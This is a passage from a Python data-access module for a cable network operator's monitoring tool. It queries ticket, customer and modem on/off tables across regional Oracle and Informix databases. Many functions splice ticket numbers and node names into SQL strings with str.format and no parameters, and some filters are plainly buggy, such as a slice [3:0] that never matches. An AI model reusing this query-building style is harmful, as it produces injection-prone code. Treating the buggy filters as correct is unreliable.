get_customers(t_interval, nodes):\r\n hierarchy = \"Kunde\"\r\n return get_hierarchy_members(nodes, hierarchy)\r\n\r\n\r\ndef get_hierarchy_members(nodes, hierarchy):\r\n data = []\r\n if nodes == 'all':\r\n pass\r\n topology = nodes[0].topology\r\n hierarchy = topology.hierarchy_names.index(hierarchy)\r\n for node in nodes:\r\n if node.hierarchy == hierarchy:\r\n data.append(Datapoint(None,\r\n node.name,\r\n datetime.datetime.now(),\r\n datetime.datetime.now(),\r\n node.name))\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\ndef get_lower_nodes_of_tickets(ticket_number_ints):\r\n result = collections.defaultdict(list)\r\n live_sql = u\"\"\"\r\nSELECT a_auftrag_id, a_typ, a_duvt_ref_id as found\r\nFROM ta_auftrag_netzdaten_duvt\r\nWHERE a_auftrag_id in ({ticket_number_ints})\r\n\"\"\"\r\n live_sql = live_sql.format(ticket_number_ints=','.join([str(i) for i in ticket_number_ints]))\r\n data = set(_fetch_with_spiegel(live_sql, kind='process'))\r\n for entry in data:\r\n ticket_number_int = entry[0]\r\n node_type = entry[1].strip()\r\n node_id = entry[2]\r\n if node_type == 'VzK':\r\n result[ticket_number_int].append('C-Linie R{} {}'.format(str(ticket_number_int)[0], node_id))\r\n if node_type == u'ÜP':\r\n result[ticket_number_int].append('UEP R{} {}'.format(str(ticket_number_int)[0], node_id))\r\n return result\r\n\r\ndef get_onoff(t_interval, nodes):\r\n static_sql = u\"\"\"\r\nSELECT case when cablemodem_status = 1 then 'OFF'\r\n when cablemodem_status = 12 then 'ON' else NULL END AS value\r\n ,created AS starttime\r\n ,created AS stoptime\r\n ,'MAC ' || cablemodem_mac AS node_name\r\nFROM netcam_cm_onoff_events\r\nWHERE created >= To_date('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND created < To_date('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n\"\"\"\r\n static_nodessql = u\"AND 'MAC ' || cablemodem_mac in ({nodes}) \"\r\n data_format = lambda: None\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"), t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n oracle_db = oracle.Oracle()\r\n static_data = []\r\n\r\n if static_interval:\r\n logger.info('Fetching from static database.')\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == \"MAC\"]\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n if t_interval[1] > datetime.datetime.now() - datetime.timedelta(seconds=60):\r\n try:\r\n oracle_db.executeSQL('select netcam_cm_onoff_events_upd_tme() from dual')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n static_data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(static_data, data_format)\r\n\r\n data = static_data\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\ndef sx_in_unit(unit, region):\r\n live_sql = u\"\"\"\r\nSELECT count(1) as found\r\nFROM ta_auftrag_kopfdaten\r\nWHERE a_auftragseinheit_id = {unit}\r\nAND a_auftragsklasse = 'SX'\r\n\"\"\"\r\n live_sql = live_sql.format(unit=unit)\r\n result = _fetch_with_spiegel(live_sql, assoc=True, region=region, kind='process')\r\n if result:\r\n result = result[0]\r\n return result\r\n\r\ndef get_single_ticket(ticketnumber):\r\n live_sql = u\"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftrag_id as tick_id\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,A_AUFTR_IN_DISPO AS a_auftr_in_dispo\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\nFROM ta_auftrag_kopfdaten\r\n \"\"\"\r\n if not isinstance(ticketnumber, int) and '/' in ticketnumber:\r\n live_sql += \" where a_auftrnr = '{}'\".format(ticketnumber)\r\n region = int(ticketnumber[2])\r\n else:\r\n live_sql += \" where a_auftrag_id = {}\".format(ticketnumber)\r\n region = int((str(ticketnumber)[0]))\r\n result = _fetch_with_spiegel(live_sql, assoc=True, region=region, kind='process')\r\n if result:\r\n result = result[0]\r\n return result\r\n\r\n\r\ndef get_mgt_tickets_live(t_interval, nodes, live_period=4):\r\n live_period = datetime.timedelta(days=live_period)\r\n static_sql = u\"\"\"\r\n SELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,ST3_ST3_AUFTRBESCHREIBUNG_MAX AS st3_st3\r\n ,ST3_ZUS_AUFTRBESCHREIBUNG_MAX AS st3_zus\r\n ,NULL AS bemerkung\r\n ,REF_FEHLERURSACHE AS fehler\r\n ,REF_ABSCHLUSSERGEBNIS AS ergebnis\r\n ,A_AUFTRAGSART AS AUFTRAGSART\r\n ,A_ORGETYP AS ORGETYP\r\n ,A_NETZEBENE as NE\r\n ,a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'VRP R' || region || ' ' || an_bk_netzelem_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse IN (\r\n 'CH'\r\n ,'SD'\r\n ,'SM'\r\n ,'SX'\r\n )\r\n AND A_STOERUNG_VON >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n )\r\n AND an_bk_netzelem_id IS NOT NULL\r\n AND a_bearbeitungszustand != 'st'\r\n \"\"\"\r\n static_nodessql = \"AND 'VRP R' || region || ' ' || an_bk_netzelem_id in ({nodes})\"\r\n\r\n live_sql = u\"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,trim(a_auftragsbeschreibung_st3) AS st3_st3\r\n ,NULL::VARCHAR AS st3_zus\r\n ,NULL::VARCHAR AS bemerkung\r\n ,NULL::VARCHAR AS fehler\r\n ,NULL::VARCHAR AS ergebnis\r\n ,NULL::VARCHAR AS AUFTRAGSART\r\n ,NULL::VARCHAR AS ORGETYP\r\n ,NULL::VARCHAR AS NE\r\n ,tak.a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'VRP R' || '{region}' || ' ' || an.a_bk_netzelem_id AS node_name\r\nFROM ta_auftrag_kopfdaten tak\r\nLEFT JOIN ta_auftrag_netzdaten an\r\n ON tak.a_auftrag_id = an.a_auftrag_id\r\nWHERE a_auftragsklasse IN (\r\n 'CH'\r\n ,'SD'\r\n ,'SM'\r\n ,'SX'\r\n )\r\n AND A_STOERUNG_VON >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE(\"{stop}\", \"%d.%m.%Y %H:%M:%S\")\r\n )\r\n AND an.a_bk_netzelem_id IS NOT NULL\r\n AND a_bearbeitungszustand != 'st'\r\n AND a_anzeige_in_ms_liste is not NULL\r\n AND a_anzeige_in_ms_liste != 'N'\r\n AND a_anzeige_in_ms_liste != 'O'\r\n AND (a_anbuendelung_deaktiviert is NULL or a_anbuendelung_deaktiviert != 'J')\r\n \"\"\"\r\n live_nodessql = \"AND 'VRP R' || '{region}' || ' ' || an.a_bk_netzelem_id in ({nodes})\"\r\n data_format = Ticketdata\r\n\r\n static_interval, live_interval = _split_live_static(t_interval[0], t_interval[1], live_period)\r\n oracle_db = oracle.Oracle()\r\n static_data = []\r\n live_data = []\r\n\r\n if static_interval:\r\n logger.info('Fetching from static database.')\r\n table = None\r\n if nodes != 'all':\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n static_data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(static_data, data_format)\r\n\r\n if live_interval:\r\n logger.info('Fetching from live database.')\r\n if nodes != 'all' and len(nodes) <= 1000:\r\n nodessql = _fill_nodessql(live_nodessql, nodes)\r\n live_sql = live_sql + nodessql\r\n live_sql = live_sql.format(region='{region}', start=live_interval[0], stop=live_interval[1])\r\n live_data = _fetch_with_spiegel(live_sql, kind='process')\r\n if len(nodes) > 1000:\r\n logger.info('Filtering nodes.')\r\n nodeset = set([node.name for node in nodes])\r\n live_data = [i for i in live_data if i[-1] in nodeset]\r\n _map_tuple_to_tuples(live_data, data_format, dates=[5, 6, 7, 8, 9, 10, -2, -3])\r\n\r\n data = static_data + live_data\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n\r\ndef get_mgt_tickets(t_interval, nodes):\r\n \"\"\"\r\n only update static table when t_interval[1] > datetime.now() - 1 Min\r\n \"\"\"\r\n from updateroutine import TicketsSQLUpdate\r\n\r\n static_sql = u\"\"\"\r\n SELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,ST3_ST3_AUFTRBESCHREIBUNG_MAX AS st3_st3\r\n ,ST3_ZUS_AUFTRBESCHREIBUNG_MAX AS st3_zus\r\n ,NULL AS bemerkung\r\n ,REF_FEHLERURSACHE AS fehler\r\n ,REF_ABSCHLUSSERGEBNIS AS ergebnis\r\n ,A_AUFTRAGSART AS AUFTRAGSART\r\n ,A_ORGETYP AS ORGETYP\r\n ,A_NETZEBENE as NE\r\n ,a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'VRP R' || region || ' ' || an_bk_netzelem_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse IN (\r\n 'CH'\r\n ,'SD'\r\n ,'SM'\r\n ,'SX'\r\n )\r\n AND A_STOERUNG_VON >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n )\r\n AND an_bk_netzelem_id IS NOT NULL\r\n AND a_bearbeitungszustand != 'st'\r\n \"\"\"\r\n static_nodessql = \"AND 'VRP R' || region || ' ' || an_bk_netzelem_id in ({nodes})\"\r\n\r\n data_format = Ticketdata\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n\r\n oracle_db = oracle.Oracle()\r\n if t_interval[1] > datetime.datetime.now() - datetime.timedelta(seconds=60):\r\n try:\r\n logger.debug('Update static database.')\r\n TicketsSQLUpdate().update_tickets(oracle_db)\r\n logger.debug('Fetching from static database.')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[3:0] == \"VRP\"]\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n\r\ndef get_sk_tickets(t_interval, nodes):\r\n \"\"\"\r\n only update static table when t_interval[1] > datetime.now() - 1 Min\r\n \"\"\"\r\n from updateroutine import TicketsSQLUpdate\r\n\r\n static_sql = u\"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,ST3_ST3_AUFTRBESCHREIBUNG_MAX AS st3_st3\r\n ,ST3_ZUS_AUFTRBESCHREIBUNG_MAX AS st3_zus\r\n ,NULL AS bemerkung\r\n ,REF_FEHLERURSACHE AS fehler\r\n ,REF_ABSCHLUSSERGEBNIS AS ergebnis\r\n ,A_AUFTRAGSART AS AUFTRAGSART\r\n ,A_ORGETYP AS ORGETYP\r\n ,A_NETZEBENE as NE\r\n ,a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse in ('SK')\r\n AND A_STOERUNG_VON >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n )\r\n AND a_bearbeitungszustand != 'st'\r\n \"\"\"\r\n static_nodessql = \"AND 'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id in ({nodes})\"\r\n\r\n data_format = Ticketdata\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n oracle_db = oracle.Oracle()\r\n if (t_interval[1] > (datetime.datetime.now() - datetime.timedelta(seconds=60))):\r\n try:\r\n logger.debug('Update static database.')\r\n TicketsSQLUpdate().update_tickets(oracle_db)\r\n logger.debug('Fetching from static database.')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == \"Kun\"]\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n\r\ndef get_customer_contacts(t_interval, nodes):\r\n \"\"\"\r\n only update static table when t_interval[1] > datetime.now() - 1 Min\r\n \"\"\"\r\n from updateroutine import TicketsSQLUpdate\r\n\r\n static_sql = u\"\"\"\r\nSELECT a_auftrag_id AS value\r\n ,a_annahmezeitpunkt AS starttime\r\n ,a_annahmezeitpunkt AS stoptime\r\n ,'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse = 'SK'\r\n AND a_dienstkategorie <> 'NTF'\r\n AND a_annahmezeitpunkt >= To_date('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND a_annahmezeitpunkt < To_date('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n \"\"\"\r\n static_nodessql = \"AND 'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id in ({nodes})\"\r\n\r\n data_format = lambda: None\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n oracle_db = oracle.Oracle()\r\n\r\n if t_interval[1] > datetime.datetime.now() - datetime.timedelta(seconds=60):\r\n try:\r\n logger.debug('Update static database.')\r\n TicketsSQLUpdate().update_tickets(oracle_db)\r\n logger.debug('Fetching from static database.')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == 'Kun']\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n\r\ndef get_auftrag_id(a_auftrag_ids):\r\n\r\n sql = \"select a_auftrnr, a_auftrag_id from ta_auftrag_kopfdaten where a_auftrag_id in ({})\"\r\n sql = sql.format(\",\".join([str(i) for i in a_auftrag_ids]))\r\n data = _fetch_with_spiegel(sql, kind='process')\r\n return data\r\n\r\n\r\ndef get_unbundeled_fieldtickets(t_interval):\r\n sql = \"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,trim(a_auftragsbeschreibung_st3) AS st3_st3\r\n ,trim(st3_zus.a_auftragsbeschreibung) AS st3_zus\r\n ,NULL::VARCHAR AS bemerkung\r\n ,NULL::VARCHAR AS fehler\r\n ,NULL::VARCHAR AS ergebnis\r\n ,NULL::VARCHAR AS auftragsart\r\n ,NULL::VARCHAR as orgetyp\r\n ,NULL::VARCHAR as NE\r\n ,tak.a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'Kunde ' || trim(tkzp.a_kundennummer) || ' - ' || a_grundstueck_id AS node_name\r\nFROM (\r\n SELECT *\r\n FROM ta_auftrag_kopfdaten\r\n WHERE a_annahmezeitpunkt >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n AND a_annahmezeitpunkt < TO_DATE(\"{stop}\", \"%d.%m.%Y %H:%M:%S\")\r\n AND a_auftragsklasse IN ('SK')\r\n AND (a_orgetyp = 'P' OR a_plangr_kb = 'TSSD3')\r\n AND a_auftragsart = 'Aufgabe'\r\n AND a_auftragseinheit_id IS NULL\r\n AND a_einzelauftrag_kz = 'N'\r\n ) tak\r\nLEFT JOIN (\r\n SELECT base.a_auftrag_id\r\n ,trim(st3.A_AUFTRAGSBESCHREIBUNG) AS A_AUFTRAGSBESCHREIBUNG\r\n FROM (\r\n SELECT a_auftrag_id\r\n ,max(A_AUFTRAGSBESCHREIBUNG_ST3_ID) AS maxid\r\n FROM ta_auftrag_beschreibung_st3\r\n WHERE a_kenner = 'ZUS'\r\n AND a_modifiziert_zeitpunkt >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n GROUP BY a_auftrag_id\r\n ) base\r\n LEFT JOIN ta_auftrag_beschreibung_st3 st3\r\n ON base.a_auftrag_id = st3.a_auftrag_id\r\n AND base.maxid = st3.A_AUFTRAGSBESCHREIBUNG_ST3_ID\r\n ) st3_zus\r\n ON tak.a_auftrag_id = st3_zus.a_auftrag_id\r\nLEFT JOIN (\r\n SELECT a_auftrag_id\r\n ,max(a_kundennummer) a_kundennummer\r\n FROM ta_kauf_zu_person\r\n WHERE a_person_typ_kb = 'KUN'\r\n AND a_modifiziert_zeitpunkt >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n GROUP BY a_auftrag_id\r\n ) tkzp\r\n ON tak.a_auftrag_id = tkzp.a_auftrag_id\r\n \"\"\".format(start=t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n stop=t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\"))\r\n\r\n data = _fetch_with_spiegel(sql, kind='process')\r\n logger.debug('Fetched {} unbundeled fieldtickets.'.format(len(data)))\r\n _map_tuple_to_tuples(data, Ticketdata, dates=[5, 6, 7, 8, 9, 10, -2, -3])\r\n return data\r\n\r\n\r\ndef _map_tuple_to_tuples(data, data_format, dates=[]):\r\n \"\"\"\r\n Convert incoming tuples of data to :py:class:`.Datapoint` containing an optional data_format as data.\r\n\r\n :param data: The input data.\r\n :param data_format: the Namedtuple to use for additional data.\r\n :param dates: a list of indices that should be converted to datetime format\r\n\r\n Usage::\r\n\r\n >>> data = (1, datetime.datetime(2013, 1, 1), datetime.datetime(2013, 1, 2), \"MAC 12121211\")\r\n >>> _map_tuple_to_tuples(data, lambda: None)\r\n >>> data\r\n [Datapoint(data=None, value=1, starttime=datetime.datetime(2013, 1, 1, 0, 0), \\\r\n stoptime=datetime.datetime(2013, 1, 2, 0, 0), node_name='MAC 12121211')]\r\n \"\"\"\r\n deletes = []\r\n for i, entry in enumerate(data):\r\n if dates:\r\n entry = list(entry)\r\n for j in dates:\r\n if entry[j]:\r\n entry[j] = datetime.datetime.strptime(entry[j], '%Y-%m-%d %H:%M:%S.%f')\r\n if all([entry[j] is not None for j in [-4, -3, -1]]):\r\n data[i] = Datapoint(data_format(*entry[:-4]), *entry[-4:])\r\n else:\r\n deletes.append(i)\r\n for entry in sorted(deletes, reverse=True):\r\n del data[entry]\r\n\r\n\r\ndef _map_dict_to_tuples(data, data_format):\r\n deletes = []\r\n for i, entry in enumerate(data):\r\n basetuple = []\r\n for key in ['value', 'starttime', 'stoptime', 'node_name']:\r\n basetuple.append(entry[key])\r\n del entry[key]\r\n if all([j is not None for j in basetuple]):\r\n data[i] = Datapoint(*basetuple, data=data_format(**entry))\r\n else:\r\n deletes.append(i)\r\n for entry in sorted(deletes, reverse=True):\r\n del data[entry]\r\n\r\n\r\ndef _fetch_with_spiegel(sql, assoc=False, region='all', kind='data'):\r\n if kind == 'data':\r\n delphi_regions = DELPHI_REGIONS_DATA\r\n delphi_connstring = DELPHI_CONNSTRING_DATA\r\n else:\r\n delphi_regions = DELPHI_REGIONS_PROCESS\r\n delphi_connstring = DELPHI_CONNSTRING_PROCESS\r\n data = []\r\n logger.debug(u'Executing SQL on Spiegel :{}'.format(sql))\r\n if region == 'all':\r\n regions = delphi_regions.items()\r\n else:\r\n regions = [[region, delphi_regions[region]]]\r\n for region, params in regions:\r\n if '{region}' in sql:\r\n tempsql = sql.format(region=region)\r\n logger.debug(u'Executing SQL on Spiegel :{}'.format(tempsql))\r\n else:\r\n tempsql = sql\r\n tempdata = []\r\n logger.info('Fetching Region {}'.format(region))\r\n conn = ibm_db.connect(delphi_connstring.format(*params), \"\", \"\")\r\n stmt = ibm_db.prepare(conn, tempsql)\r\n try:\r\n ibm_db.execute(stmt)\r\n except:\r\n logger.exception('Informix Database exception caught: {}'.format(sys.exc_info()[1]))\r\n logger.error('SQL: \\n{}'.format(tempsql))\r\n return data\r\n if assoc:\r\n row = ibm_db.fetch_assoc(stmt)\r\n else:\r\n row = ibm_db.fetch_tuple(stmt)\r\n while row:\r\n tempdata.append(row)\r\n if assoc:\r\n row = ibm_db.fetch_assoc(stmt)\r\n else:\r\n row = ibm_db.fetch_tuple(stmt)\r\n ibm_db.free_stmt(stmt)\r\n ibm_db.close(conn)\r\n logger.debug('Fetched {} rows.'.format(len(tempdata)))\r\n data.extend(tempdata)\r\n return data\r\n\r\n\r\ndef _fill_nodessql(nodessql, nodes, table=None):\r\n if nodes == 'all':\r\n return ''\r\n if table:\r\n nodessql = nodessql.format(nodes=\"Select nodename from {}\".format(table))\r\n else:\r\n nodestring = \"','\".join([node if (isinstance(node, str) or isinstance(node, unicode))\r\n else str(node.name) if (isinstance(node.name, int) or isinstance(node.name, float))\r\n else node.name\r\n for node in nodes])\r\n nodestring = \"'{}'\".format(nodestring)\r\n nodessql = nodessql.format(nodes=nodestring, region='{region}')\r\n return nodessql\r\n\r\n\r\ndef get_raw_data(topology, data_kinds, t_interval, nodes='all'):\r\n \"\"\"\r\n Translate request into sql and return the table as result.\r\n\r\n :param data_kinds: kind of data\r\n :type data_kinds: string / tuple of strings\r\n :param t_interval: time intervals\r\n :type t_interval: tuple of datetime\r\n :param nodes: node id, or 'all' (default) if no nodes should be excluded\r\n :type nodes: tuple of integers / string\r\n :returns: data as imported with sql\r\n :rtype: tuples of named tuples\r\n \"\"\"\r\n\r\n unordered_data = []\r\n unordered_nodes = []\r\n logger.info('Fetching raw data.')\r\n\r\n if (data_kinds == 'all'):\r\n data_kinds = DATA_DICT.keys()\r\n\r\n datapipes = []\r\n\r\n def _parralel_data_fetch(queue, data_kind, t_interval, nodes):\r\n queue.put(DATA_DICT[data_kind](t_interval, nodes))\r\n logger.info('Got raw data of data kind: {}'.format(data_kind))\r\n\r\n for 